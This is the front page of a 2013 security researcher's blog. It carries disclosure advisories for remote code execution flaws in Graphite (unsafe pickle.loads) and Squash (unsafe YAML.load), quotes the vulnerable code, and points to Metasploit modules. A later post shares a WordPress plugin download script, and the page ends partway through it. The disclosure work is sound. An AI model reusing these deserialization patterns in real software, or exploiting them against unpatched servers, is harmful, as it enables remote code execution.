index.html

<!DOCTYPE html>
<!--[if IE 6]>
<html id="ie6" lang="en-US">
<![endif]-->
<!--[if IE 7]>
<html id="ie7" lang="en-US">
<![endif]-->
<!--[if IE 8]>
<html id="ie8" lang="en-US">
<![endif]-->
<!--[if !(IE 6) | !(IE 7) | !(IE 8)  ]><!-->
<html lang="en-US">
<!--<![endif]-->
<head>
<base href="https://charlieeriksen.github.io" />

<meta charset="UTF-8" />
<meta name="viewport" content="initial-scale=1.0, width=device-width" />
<title>ceriksen.com</title>

<link rel="stylesheet" type="text/css" media="all" href="https://charlieeriksen.github.io/wp-content/themes/simplex/style.css" />

<!--[if lt IE 9]>
<script src="https://charlieeriksen.github.io/wp-content/themes/simplex/js/html5.js" type="text/javascript"></script>
<script src="https://charlieeriksen.github.io/wp-content/themes/simplex/js/css3-mediaqueries.js"></script>
<![endif]-->


<link rel='stylesheet' id='crayon-css'  href='https://charlieeriksen.github.io/wp-content/plugins/crayon-syntax-highlighter/css/min/crayon.min.css?ver=2.5.0' type='text/css' media='all' />
<link rel='stylesheet' id='crayon-theme-twilight-css'  href='https://charlieeriksen.github.io/wp-content/plugins/crayon-syntax-highlighter/themes/twilight/twilight.css?ver=2.5.0' type='text/css' media='all' />
<link rel='stylesheet' id='crayon-font-monaco-css'  href='https://charlieeriksen.github.io/wp-content/plugins/crayon-syntax-highlighter/fonts/monaco.css?ver=2.5.0' type='text/css' media='all' />
<script type='text/javascript' src='https://charlieeriksen.github.io/wp-includes/js/jquery/jquery.js?ver=1.10.2'></script>
<script type='text/javascript' src='https://charlieeriksen.github.io/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var quicktagsL10n = {"closeAllOpenTags":"Close all open tags","closeTags":"close tags","enterURL":"Enter the URL","enterImageURL":"Enter the URL of the image","enterImageDescription":"Enter a description of the image","fullscreen":"fullscreen","toggleFullscreen":"Toggle fullscreen mode","textdirection":"text direction","toggleTextdirection":"Toggle Editor Text Direction"};
/* ]]> */
</script>
<script type='text/javascript' src='https://charlieeriksen.github.io/wp-includes/js/quicktags.min.js?ver=3.8.3'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var CrayonSyntaxSettings = {"version":"2.5.0","is_admin":"0","ajaxurl":"http:\/\/ceriksen.com\/wp-admin\/admin-ajax.php","prefix":"crayon-","setting":"crayon-setting","selected":"crayon-setting-selected","changed":"crayon-setting-changed","special":"crayon-setting-special","orig_value":"data-orig-value","debug":""};
var CrayonSyntaxStrings = {"copy":"Press %s to Copy, %s to Paste","minimize":"Click To Expand Code"};
var CrayonTagEditorSettings = {"home_url":"http:\/\/ceriksen.com","css":"crayon-te","css_selected":"crayon-selected","code_css":"#crayon-code","url_css":"#crayon-url","url_info_css":"#crayon-te-url-info","lang_css":"#crayon-lang","title_css":"#crayon-title","mark_css":"#crayon-mark","range_css":"#crayon-range","inline_css":"crayon-inline","inline_hide_css":"crayon-hide-inline","inline_hide_only_css":"crayon-hide-inline-only","hl_css":"#crayon-highlight","switch_html":"#content-html","switch_tmce":"#content-tmce","tinymce_button":"a.mce_crayon_tinymce","submit_css":"#crayon-te-ok","cancel_css":"#crayon-te-cancel","content_css":"#crayon-te-content","dialog_title_css":"#crayon-te-title","submit_wrapper_css":"#crayon-te-submit-wrapper","data_value":"data-value","attr_sep":":","css_sep":"_","fallback_lang":"default","dialog_title_add":"Add Crayon Code","dialog_title_edit":"Edit Crayon Code","submit_add":"Add","submit_edit":"Save","bar":"#crayon-te-bar","bar_content":"#crayon-te-bar-content","extensions":{"scpt":"applescript","applescript":"applescript","swf":"as","fla":"as","cs":"c#","h":"c++","hh":"c++","hpp":"c++","hxx":"c++","h++":"c++","cc":"c++","cpp":"c++","cxx":"c++","c++":"c++","pas":"delphi","java":"java","class":"java","jar":"java","mv":"miva","mvc":"miva","mvt":"miva","m":"objc","mm":"objc","pl":"perl","py":"python","pyw":"python","pyc":"python","pyo":"python","pyd":"python","rb":"ruby","rbx":"ruby","rhtml":"ruby","vbs":"vb"}};
var CrayonSyntaxSettings = {"version":"2.5.0","is_admin":"0","ajaxurl":"http:\/\/ceriksen.com\/wp-admin\/admin-ajax.php","prefix":"crayon-","setting":"crayon-setting","selected":"crayon-setting-selected","changed":"crayon-setting-changed","special":"crayon-setting-special","orig_value":"data-orig-value","debug":""};
var CrayonSyntaxStrings = {"copy":"Press %s to Copy, %s to Paste","minimize":"Click To Expand Code"};
/* ]]> */
</script>
<script type='text/javascript' src='https://charlieeriksen.github.io/wp-content/plugins/crayon-syntax-highlighter/js/min/crayon.te.min.js?ver=2.5.0'></script>
<script type='text/javascript' src='https://charlieeriksen.github.io/wp-content/themes/simplex/lib/js/jquery.fitvids.js?ver=3.8.3'></script>

 

<script type="text/javascript">
var _gaq = _gaq || [];
_gaq.push(['_setAccount', 'UA-32892239-1']);
_gaq.push(['_trackPageview']);
(function() {
var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
})();
</script>

	<script type="text/javascript">
		jQuery(document).ready(function(){
			jQuery("#page").fitVids();	 
		});
	</script>	<style type="text/css">
			#site-title a,
		#site-description {
			color: #e6941e !important;
		}
		</style>
	
</head>

<body lang="en" class="home blog  single-author">
<div id="page" class="hfeed">
	<header id="branding" role="banner">
		<hgroup>
			<h1 id="site-title"><a href="https://charlieeriksen.github.io/" title="ceriksen.com" rel="home">ceriksen.com</a></h1>
			<h2 id="site-description"></h2>
						
							<form role="search" method="get" id="searchform" class="searchform" action="https://charlieeriksen.github.io/">
				<div>
					<label class="screen-reader-text" for="s">Search for:</label>
					<input type="text" value="" name="s" id="s" />
					<input type="submit" id="searchsubmit" value="Search" />
				</div>
			</form>					</hgroup>
		
		<nav id="access" role="navigation">
			<h2 class="assistive-text">Main menu</h2>
			<div class="skip-link screen-reader-text"><a href="#content" title="Skip to content">Skip to content</a></div>

			<div class="menu"><ul><li class="current_page_item"><a href="https://charlieeriksen.github.io/">Home</a></li></ul></div>

		</nav><!-- #access -->
		<div class="clear"></div>
	</header><!-- #branding -->

	<div id="main">
		<div id="primary">
			<div id="content" role="main">

			
					<nav id="nav-above">
		<h2 class="assistive-text">Post navigation</h2>

		
		
						<div class="nav-previous"><a href="https://charlieeriksen.github.io/page/2/" ><span class="meta-nav">&larr;</span> Older posts</a></div>
				
						
		
	
	</nav><!-- #nav-above -->
	
								
					
<article id="post-292" class="post-292 post type-post status-publish format-standard hentry category-advisories tag-graphite tag-re">
	<header class="entry-header">
				<div class="entry-meta">
			<a href="https://charlieeriksen.github.io/2013/08/20/graphite-remote-code-execution-vulnerability-advisory/" title="4:01 pm" rel="bookmark" class="entry-date"><time datetime="2013-08-20T16:01:50+00:00" pubdate>August 20, 2013</time></a> by Charlie Eriksen		</div><!-- .entry-meta -->
		<h2 class="entry-title"><a href="https://charlieeriksen.github.io/2013/08/20/graphite-remote-code-execution-vulnerability-advisory/" title="Permalink to Graphite remote code execution vulnerability advisory" rel="bookmark">Graphite remote code execution vulnerability advisory</a></h2>

				
					</header><!-- .entry-header -->
	

		<div class="entry-content">
				<p><strong>Introduction</strong><br />
In <a href="http://graphite.wikidot.com/">graphite-web</a> version between 0.9.5 and 0.9.10, a vulnerability exists as a result of unsafe use of the &#8220;pickle&#8221; module by the product.</p>
<p>The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2013-5093 to this issue. This is an entry on the CVE  list (<a href="http://cve.mitre.org/" target="_blank">http://cve.mitre.org</a>), which standardizes names for security problems.</p>
<p><strong>Timeline</strong><br />
2013-08-06 &#8211; Vendor contacted<br />
2013-08-06 &#8211; Vendor confirms issue<br />
2013-08-07 &#8211; Sent CVE request, CVE-2013-5093 is assigned<br />
2013-08-20 &#8211; Graphite 0.9.11 released<br />
2013-08-20 &#8211; Advisory released</p>
<p><strong>Analysis</strong><br />
In graphite-web 0.9.5, a &#8220;clustering&#8221; feature was introduced to allow for scaling for a graphite setup. This was achieved by passing pickles between servers, and it was introduced in <a href="https://github.com/graphite-project/graphite-web/commit/71d395ee68c156da00504cb41d353980e0afb470">this commit</a>.</p>
<p>The function &#8220;renderLocalView&#8221;, seen below, takes a request that contains a chart type, and a pickle:</p><!-- Crayon Syntax Highlighter v2.5.0 -->

		<div id="crayon-53c98e7805a2f127111174" class="crayon-syntax crayon-theme-twilight crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover" style=" margin-top: 12px; margin-bottom: 12px; float: none; clear: both; font-size: 12px !important; line-height: 15px !important;">
		
			<div class="crayon-toolbar" data-settings=" mouseover hide delay" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><span class="crayon-title"></span>
			<div class="crayon-tools" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><div class="crayon-button crayon-nums-button" title="Toggle Line Numbers"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-plain-button" title="Toggle Plain Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-wrap-button" title="Toggle Line Wrap"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-expand-button" title="Expand Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-copy-button" title="Copy"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-popup-button" title="Open Code In New Window"><div class="crayon-button-icon"></div></div><span class="crayon-language">Python</span></div></div>
			<div class="crayon-info" style="min-height: 16.8px !important; line-height: 16.8px !important;"></div>
			<div class="crayon-plain-wrap"><textarea wrap="soft" class="crayon-plain print-no" data-settings="dblclick" readonly style="-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;">
def renderLocalView(request):
  try:
    start = time()
    reqParams = StringIO(request.raw_post_data)
    graphType = reqParams.readline().strip()
    optionsPickle = reqParams.read()
    reqParams.close()
    graphClass = GraphTypes[graphType]
    options = pickle.loads(optionsPickle)
    image = doImageRender(graphClass, options)
    log.rendering("Delegated rendering request took %.6f seconds" % (time() -  start))
    return buildResponse(image)
  except:
    log.exception("Exception in web.render.views.rawrender")
    return HttpResponseServerError()</textarea></div>
			<div class="crayon-main" style="">
				<table class="crayon-table">
					<tr class="crayon-row">
				<td class="crayon-nums " data-settings="show">
					<div class="crayon-nums-content" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-53c98e7805a2f127111174-1">1</div><div class="crayon-num crayon-striped-num" data-line="crayon-53c98e7805a2f127111174-2">2</div><div class="crayon-num" data-line="crayon-53c98e7805a2f127111174-3">3</div><div class="crayon-num crayon-striped-num" data-line="crayon-53c98e7805a2f127111174-4">4</div><div class="crayon-num" data-line="crayon-53c98e7805a2f127111174-5">5</div><div class="crayon-num crayon-striped-num" data-line="crayon-53c98e7805a2f127111174-6">6</div><div class="crayon-num" data-line="crayon-53c98e7805a2f127111174-7">7</div><div class="crayon-num crayon-striped-num" data-line="crayon-53c98e7805a2f127111174-8">8</div><div class="crayon-num" data-line="crayon-53c98e7805a2f127111174-9">9</div><div class="crayon-num crayon-striped-num" data-line="crayon-53c98e7805a2f127111174-10">10</div><div class="crayon-num" data-line="crayon-53c98e7805a2f127111174-11">11</div><div class="crayon-num crayon-striped-num" data-line="crayon-53c98e7805a2f127111174-12">12</div><div class="crayon-num" data-line="crayon-53c98e7805a2f127111174-13">13</div><div class="crayon-num crayon-striped-num" data-line="crayon-53c98e7805a2f127111174-14">14</div><div class="crayon-num" data-line="crayon-53c98e7805a2f127111174-15">15</div></div>
				</td>
						<td class="crayon-code"><div class="crayon-pre" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-line" id="crayon-53c98e7805a2f127111174-1"><span class="crayon-r">def</span><span class="crayon-h"> </span><span class="crayon-e">renderLocalView</span><span class="crayon-sy">(</span><span class="crayon-i">request</span><span class="crayon-sy">)</span><span class="crayon-o">:</span></div><div class="crayon-line crayon-striped-line" id="crayon-53c98e7805a2f127111174-2"><span class="crayon-h">&nbsp;&nbsp;</span><span class="crayon-st">try</span><span class="crayon-o">:</span></div><div class="crayon-line" id="crayon-53c98e7805a2f127111174-3"><span class="crayon-h">&nbsp;&nbsp;&nbsp;&nbsp;</span><span class="crayon-v">start</span><span class="crayon-h"> </span><span class="crayon-o">=</span><span class="crayon-h"> </span><span class="crayon-k ">time</span><span class="crayon-sy">(</span><span class="crayon-sy">)</span></div><div class="crayon-line crayon-striped-line" id="crayon-53c98e7805a2f127111174-4"><span class="crayon-h">&nbsp;&nbsp;&nbsp;&nbsp;</span><span class="crayon-v">reqParams</span><span class="crayon-h"> </span><span class="crayon-o">=</span><span class="crayon-h"> </span><span class="crayon-k ">StringIO</span><span class="crayon-sy">(</span><span class="crayon-v">request</span><span class="crayon-sy">.</span><span class="crayon-i">raw_post_data</span><span class="crayon-sy">)</span></div><div class="crayon-line" id="crayon-53c98e7805a2f127111174-5"><span class="crayon-h">&nbsp;&nbsp;&nbsp;&nbsp;</span><span class="crayon-v">graphType</span><span class="crayon-h"> </span><span class="crayon-o">=</span><span class="crayon-h"> </span><span class="crayon-v">reqParams</span><span class="crayon-sy">.</span><span class="crayon-k ">readline</span><span class="crayon-sy">(</span><span class="crayon-sy">)</span><span class="crayon-sy">.</span><span class="crayon-e">strip</span><span class="crayon-sy">(</span><span class="crayon-sy">)</span></div><div class="crayon-line crayon-striped-line" id="crayon-53c98e7805a2f127111174-6"><span class="crayon-h">&nbsp;&nbsp;&nbsp;&nbsp;</span><span class="crayon-v">optionsPickle</span><span class="crayon-h"> </span><span class="crayon-o">=</span><span class="crayon-h"> </span><span class="crayon-v">reqParams</span><span class="crayon-sy">.</span><span class="crayon-e">read</span><span class="crayon-sy">(</span><span class="crayon-sy">)</span></div><div class="crayon-line" id="crayon-53c98e7805a2f127111174-7"><span class="crayon-h">&nbsp;&nbsp;&nbsp;&nbsp;</span><span class="crayon-v">reqParams</span><span class="crayon-sy">.</span><span class="crayon-e">close</span><span class="crayon-sy">(</span><span class="crayon-sy">)</span></div><div class="crayon-line crayon-striped-line" id="crayon-53c98e7805a2f127111174-8"><span class="crayon-h">&nbsp;&nbsp;&nbsp;&nbsp;</span><span class="crayon-v">graphClass</span><span class="crayon-h"> </span><span class="crayon-o">=</span><span class="crayon-h"> </span><span class="crayon-v">GraphTypes</span><span class="crayon-sy">[</span><span class="crayon-i">graphType</span><span class="crayon-sy">]</span></div><div class="crayon-line" id="crayon-53c98e7805a2f127111174-9"><span class="crayon-h">&nbsp;&nbsp;&nbsp;&nbsp;</span><span class="crayon-v">options</span><span class="crayon-h"> </span><span class="crayon-o">=</span><span class="crayon-h"> </span><span class="crayon-k ">pickle</span><span class="crayon-sy">.</span><span class="crayon-e">loads</span><span class="crayon-sy">(</span><span class="crayon-i">optionsPickle</span><span class="crayon-sy">)</span></div><div class="crayon-line crayon-striped-line" id="crayon-53c98e7805a2f127111174-10"><span class="crayon-h">&nbsp;&nbsp;&nbsp;&nbsp;</span><span class="crayon-v">image</span><span class="crayon-h"> </span><span class="crayon-o">=</span><span class="crayon-h"> </span><span class="crayon-e">doImageRender</span><span class="crayon-sy">(</span><span class="crayon-i">graphClass</span><span class="crayon-sy">,</span><span class="crayon-h"> </span><span class="crayon-i">options</span><span class="crayon-sy">)</span></div><div class="crayon-line" id="crayon-53c98e7805a2f127111174-11"><span class="crayon-h">&nbsp;&nbsp;&nbsp;&nbsp;</span><span class="crayon-v">log</span><span class="crayon-sy">.</span><span class="crayon-e">rendering</span><span class="crayon-sy">(</span><span class="crayon-s">"Delegated rendering request took %.6f seconds"</span><span class="crayon-h"> </span><span class="crayon-o">%</span><span class="crayon-h"> </span><span class="crayon-sy">(</span><span class="crayon-k ">time</span><span class="crayon-sy">(</span><span class="crayon-sy">)</span><span class="crayon-h"> </span><span class="crayon-o">-</span><span class="crayon-h">&nbsp;&nbsp;</span><span class="crayon-i">start</span><span class="crayon-sy">)</span><span class="crayon-sy">)</span></div><div class="crayon-line crayon-striped-line" id="crayon-53c98e7805a2f127111174-12"><span class="crayon-h">&nbsp;&nbsp;&nbsp;&nbsp;</span><span class="crayon-st">return</span><span class="crayon-h"> </span><span class="crayon-e">buildResponse</span><span class="crayon-sy">(</span><span class="crayon-i">image</span><span class="crayon-sy">)</span></div><div class="crayon-line" id="crayon-53c98e7805a2f127111174-13"><span class="crayon-h">&nbsp;&nbsp;</span><span class="crayon-st">except</span><span class="crayon-o">:</span></div><div class="crayon-line crayon-striped-line" id="crayon-53c98e7805a2f127111174-14"><span class="crayon-h">&nbsp;&nbsp;&nbsp;&nbsp;</span><span class="crayon-v">log</span><span class="crayon-sy">.</span><span class="crayon-k ">exception</span><span class="crayon-sy">(</span><span class="crayon-s">"Exception in web.render.views.rawrender"</span><span class="crayon-sy">)</span></div><div class="crayon-line" id="crayon-53c98e7805a2f127111174-15"><span class="crayon-h">&nbsp;&nbsp;&nbsp;&nbsp;</span><span class="crayon-st">return</span><span class="crayon-h"> </span><span class="crayon-e">HttpResponseServerError</span><span class="crayon-sy">(</span><span class="crayon-sy">)</span></div></div></td>
					</tr>
				</table>
			</div>
		</div>
<!-- [Format Time: 0.0064 seconds] -->
<p>However due to no explicit safety measures having been implemented to limit the types of objects that can be unpickled, this creates a condition where arbitrary code can be executed, <a href="http://blog.nelhage.com/2011/03/exploiting-pickle/">as has been documented by Nelson Elhage</a>.</p>
<p><strong>Proof of concept</strong><br />
The proof of concept can be found as a part of the Metasploit Framework <a href="https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/graphite_pickle_exec.rb">graphite_pickle_exec module</a>.</p>
					</div><!-- .entry-content -->
	
	<footer class="entry-meta">
										<span class="cat-links">
				Posted in <a href="https://charlieeriksen.github.io/category/advisories/" title="View all posts in Advisories" rel="category tag">Advisories</a>			</span>
			<span class="sep"> / </span>			
						
						<span class="tag-links">
				Tagged <a href="https://charlieeriksen.github.io/tag/graphite/" rel="tag">Graphite</a>, <a href="https://charlieeriksen.github.io/tag/re/" rel="tag">re</a>			</span>
			<span class="sep"> / </span>
							
				<span class="comments-link"><a href="https://charlieeriksen.github.io/2013/08/20/graphite-remote-code-execution-vulnerability-advisory/#respond" title="Comment on Graphite remote code execution vulnerability advisory">Leave a comment</a></span>
		<span class="sep"> / </span>
				
					</footer><!-- #entry-meta -->
</article><!-- #post-292 -->

				
					
<article id="post-282" class="post-282 post type-post status-publish format-standard hentry category-advisories tag-squash">
	<header class="entry-header">
				<div class="entry-meta">
			<a href="https://charlieeriksen.github.io/2013/08/06/squash-remote-code-execution-vulnerability-advisory/" title="6:40 pm" rel="bookmark" class="entry-date"><time datetime="2013-08-06T18:40:19+00:00" pubdate>August 6, 2013</time></a> by Charlie Eriksen		</div><!-- .entry-meta -->
		<h2 class="entry-title"><a href="https://charlieeriksen.github.io/2013/08/06/squash-remote-code-execution-vulnerability-advisory/" title="Permalink to Squash remote code execution vulnerability advisory" rel="bookmark">Squash remote code execution vulnerability advisory</a></h2>

				
					</header><!-- .entry-header -->
	

		<div class="entry-content">
				<p><strong>Introduction</strong></p>
<p>A security flaw in Square&#8217;s open source project &#8220;Squash&#8221; was fixed silently by the developers <a href="https://github.com/SquareSquash/web/commit/6d667c19e96e4f23dccbfbe24afeebd18e98e1c5">June 24th</a>, which I happened to have stumbled upon but not disclosed at the time. But since I couldn&#8217;t find an advisory for it, here it goes. Metasploit module can be found below.</p>
<p>The Common Vulnerabilities and Exposures (CVE) project has assigned the name <a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5036">CVE-2013-5036</a> to this issue. This is an entry on the CVE list (<a href="http://cve.mitre.org">http://cve.mitre.org</a>), which standardizes names for security problems.</p>
<p><strong>Analysis</strong></p>
<p>The Squash API is intended for clients to submit details about exceptions and bugs. As a part of that, a YAML dump can be submitted. However before the <a href="https://github.com/SquareSquash/web/commit/6d667c19e96e4f23dccbfbe24afeebd18e98e1c5">patch</a>, without supplying an API key, one could submit a YAML to the functions deobfuscation and sourcemap in app/controllers/api/v1_controller.rb.</p><!-- Crayon Syntax Highlighter v2.5.0 -->

		<div id="crayon-53c98e7808546719317820" class="crayon-syntax crayon-theme-twilight crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover" style=" margin-top: 12px; margin-bottom: 12px; float: none; clear: both; font-size: 12px !important; line-height: 15px !important;">
		
			<div class="crayon-toolbar" data-settings=" mouseover hide delay" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><span class="crayon-title"></span>
			<div class="crayon-tools" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><div class="crayon-button crayon-nums-button" title="Toggle Line Numbers"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-plain-button" title="Toggle Plain Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-wrap-button" title="Toggle Line Wrap"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-expand-button" title="Expand Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-copy-button" title="Copy"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-popup-button" title="Open Code In New Window"><div class="crayon-button-icon"></div></div><span class="crayon-language">Ruby</span></div></div>
			<div class="crayon-info" style="min-height: 16.8px !important; line-height: 16.8px !important;"></div>
			<div class="crayon-plain-wrap"><textarea wrap="soft" class="crayon-plain print-no" data-settings="dblclick" readonly style="-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;">
def deobfuscation
    require_params :api_key, :environment, :build, :namespace

    map = YAML.load(Zlib::Inflate.inflate(Base64.decode64(params['namespace'])))
    return head(:unprocessable_entity) unless map.kind_of?(Squash::Java::Namespace)</textarea></div>
			<div class="crayon-main" style="">
				<table class="crayon-table">
					<tr class="crayon-row">
				<td class="crayon-nums " data-settings="show">
					<div class="crayon-nums-content" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-53c98e7808546719317820-1">1</div><div class="crayon-num crayon-striped-num" data-line="crayon-53c98e7808546719317820-2">2</div><div class="crayon-num" data-line="crayon-53c98e7808546719317820-3">3</div><div class="crayon-num crayon-striped-num" data-line="crayon-53c98e7808546719317820-4">4</div><div class="crayon-num" data-line="crayon-53c98e7808546719317820-5">5</div></div>
				</td>
						<td class="crayon-code"><div class="crayon-pre" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-line" id="crayon-53c98e7808546719317820-1"><span class="crayon-r">def</span><span class="crayon-h"> </span><span class="crayon-i">deobfuscation</span></div><div class="crayon-line crayon-striped-line" id="crayon-53c98e7808546719317820-2"><span class="crayon-h">&nbsp;&nbsp;&nbsp;&nbsp;</span><span class="crayon-i">require_params</span><span class="crayon-h"> </span><span class="crayon-o">:</span><span class="crayon-i">api_key</span><span class="crayon-sy">,</span><span class="crayon-h"> </span><span class="crayon-o">:</span><span class="crayon-i">environment</span><span class="crayon-sy">,</span><span class="crayon-h"> </span><span class="crayon-o">:</span><span class="crayon-i">build</span><span class="crayon-sy">,</span><span class="crayon-h"> </span><span class="crayon-o">:</span><span class="crayon-i">namespace</span></div><div class="crayon-line" id="crayon-53c98e7808546719317820-3">&nbsp;</div><div class="crayon-line crayon-striped-line" id="crayon-53c98e7808546719317820-4"><span class="crayon-h">&nbsp;&nbsp;&nbsp;&nbsp;</span><span class="crayon-v">map</span><span class="crayon-h"> </span><span class="crayon-o">=</span><span class="crayon-h"> </span><span class="crayon-k ">YAML</span><span class="crayon-sy">.</span><span class="crayon-e">load</span><span class="crayon-sy">(</span><span class="crayon-i">Zlib</span><span class="crayon-o">::</span><span class="crayon-v">Inflate</span><span class="crayon-sy">.</span><span class="crayon-e">inflate</span><span class="crayon-sy">(</span><span class="crayon-v">Base64</span><span class="crayon-sy">.</span><span class="crayon-e">decode64</span><span class="crayon-sy">(</span><span class="crayon-v">params</span><span class="crayon-sy">[</span><span class="crayon-s">'namespace'</span><span class="crayon-sy">]</span><span class="crayon-sy">)</span><span class="crayon-sy">)</span><span class="crayon-sy">)</span></div><div class="crayon-line" id="crayon-53c98e7808546719317820-5"><span class="crayon-h">&nbsp;&nbsp;&nbsp;&nbsp;</span><span class="crayon-st">return</span><span class="crayon-h"> </span><span class="crayon-e">head</span><span class="crayon-sy">(</span><span class="crayon-o">:</span><span class="crayon-i">unprocessable_entity</span><span class="crayon-sy">)</span><span class="crayon-h"> </span><span class="crayon-st">unless</span><span class="crayon-h"> </span><span class="crayon-v">map</span><span class="crayon-sy">.</span><span class="crayon-i">kind_of</span><span class="crayon-sy">?</span><span class="crayon-sy">(</span><span class="crayon-i">Squash</span><span class="crayon-o">::</span><span class="crayon-i">Java</span><span class="crayon-o">::</span><span class="crayon-i">Namespace</span><span class="crayon-sy">)</span></div></div></td>
					</tr>
				</table>
			</div>
		</div>
<!-- [Format Time: 0.0031 seconds] -->
<p>Note that the YAML load is not specified as using the safe load, which means we can exploit this by sending a YAML payload.</p>
<p><strong>Proof of concept</strong></p>
<p><a href="https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/squash_yaml_exec.rb">Metasploit module</a></p>
					</div><!-- .entry-content -->
	
	<footer class="entry-meta">
										<span class="cat-links">
				Posted in <a href="https://charlieeriksen.github.io/category/advisories/" title="View all posts in Advisories" rel="category tag">Advisories</a>			</span>
			<span class="sep"> / </span>			
						
						<span class="tag-links">
				Tagged <a href="https://charlieeriksen.github.io/tag/squash/" rel="tag">Squash</a>			</span>
			<span class="sep"> / </span>
							
				<span class="comments-link"><a href="https://charlieeriksen.github.io/2013/08/06/squash-remote-code-execution-vulnerability-advisory/#respond" title="Comment on Squash remote code execution vulnerability advisory">Leave a comment</a></span>
		<span class="sep"> / </span>
				
					</footer><!-- #entry-meta -->
</article><!-- #post-282 -->

				
					
<article id="post-276" class="post-276 post type-post status-publish format-standard hentry category-security tag-wordpress tag-wordpress-plugins">
	<header class="entry-header">
				<div class="entry-meta">
			<a href="https://charlieeriksen.github.io/2013/06/18/bsides-rhode-island-presentation-and-slides/" title="9:33 pm" rel="bookmark" class="entry-date"><time datetime="2013-06-18T21:33:10+00:00" pubdate>June 18, 2013</time></a> by Charlie Eriksen		</div><!-- .entry-meta -->
		<h2 class="entry-title"><a href="https://charlieeriksen.github.io/2013/06/18/bsides-rhode-island-presentation-and-slides/" title="Permalink to BSides Rhode Island presentation and slides" rel="bookmark">BSides Rhode Island presentation and slides</a></h2>

				
					</header><!-- .entry-header -->
	

		<div class="entry-content">
				<p>Over this weekend I went to <a href="http://www.securitybsides.com/w/page/61966594/BSidesRI">BSides Rhode Island</a> to give a presentation about the research I&#8217;ve been doing in regards to WordPress plugins. The video can be found <a href="http://www.irongeek.com/i.php?page=videos/bsidesri2013/0-0-large-scale-application-security-charlie-eriksen">here</a>, thanks to Irongeek.</p>
<p>I promised at BSides to release my slides and some of my code. So without further ado, here&#8217;s the presentation file: <a href="https://charlieeriksen.github.io/wp-content/uploads/2013/06/Large-scale-application-security.pptx">Large-scale application security</a></p>
<p>And here is the code:</p><!-- Crayon Syntax Highlighter v2.5.0 -->

		<div id="crayon-53c98e78088db566297466" class="crayon-syntax crayon-theme-twilight crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover" style=" margin-top: 12px; margin-bottom: 12px; float: none; clear: both; font-size: 12px !important; line-height: 15px !important;">
		
			<div class="crayon-toolbar" data-settings=" mouseover hide delay" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><span class="crayon-title"></span>
			<div class="crayon-tools" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><div class="crayon-button crayon-nums-button" title="Toggle Line Numbers"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-plain-button" title="Toggle Plain Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-wrap-button" title="Toggle Line Wrap"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-expand-button" title="Expand Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-copy-button" title="Copy"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-popup-button" title="Open Code In New Window"><div class="crayon-button-icon"></div></div><span class="crayon-language">Python</span></div></div>
			<div class="crayon-info" style="min-height: 16.8px !important; line-height: 16.8px !important;"></div>
			<div class="crayon-plain-wrap"><textarea wrap="soft" class="crayon-plain print-no" data-settings="dblclick" readonly style="-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;">
from bs4 import * 
import urllib
import os
from urlparse import urlsplit
import argparse

def main(args):
	if not os.path.exists(args.output):
		os.makedirs(args.output)

	for pageNumber in xrange(args.pages):
		page = BeautifulSoup(urllib.urlopen("http://wordpress.org/extend/plugins/browse/popular/page/" \
				+ str(pageNumber)).read())
		for x in page.findAll('div', {'class': 'plugin-block'}):
			if int(filter(lambda y: y.isdigit(), str(x.ul.findAll('li')[2]))) &gt; args.downloads:
				downloadLink = BeautifulSoup(urllib.urlopen(x.h3.a['href']).read()) \
					.find('p', {'class': 'button'}).a['href']
				urllib.urlretrieve(downloadLink, args.output + os.path.basename(urlsplit(downloadLink)[2]))
				print "Downloaded %s" % os.path.basename(urlsplit(downloadLink)[2])

if __name__ == "__main__":
	parser = argparse.ArgumentParser()
	parser.add_argument("-d", "--downloads", help="Minimum number of plugin downloads", default=100000, type=int)
	parser.add_argument("-o", "--output", help="Output folder", default="", type=str)
	parser.add_argument("-p", "--pages", help="Number of pages to parse", default=250, type=int)
	args = parser.parse_args()
	main(args)</textarea></div>
			<div class="crayon-main" style="">
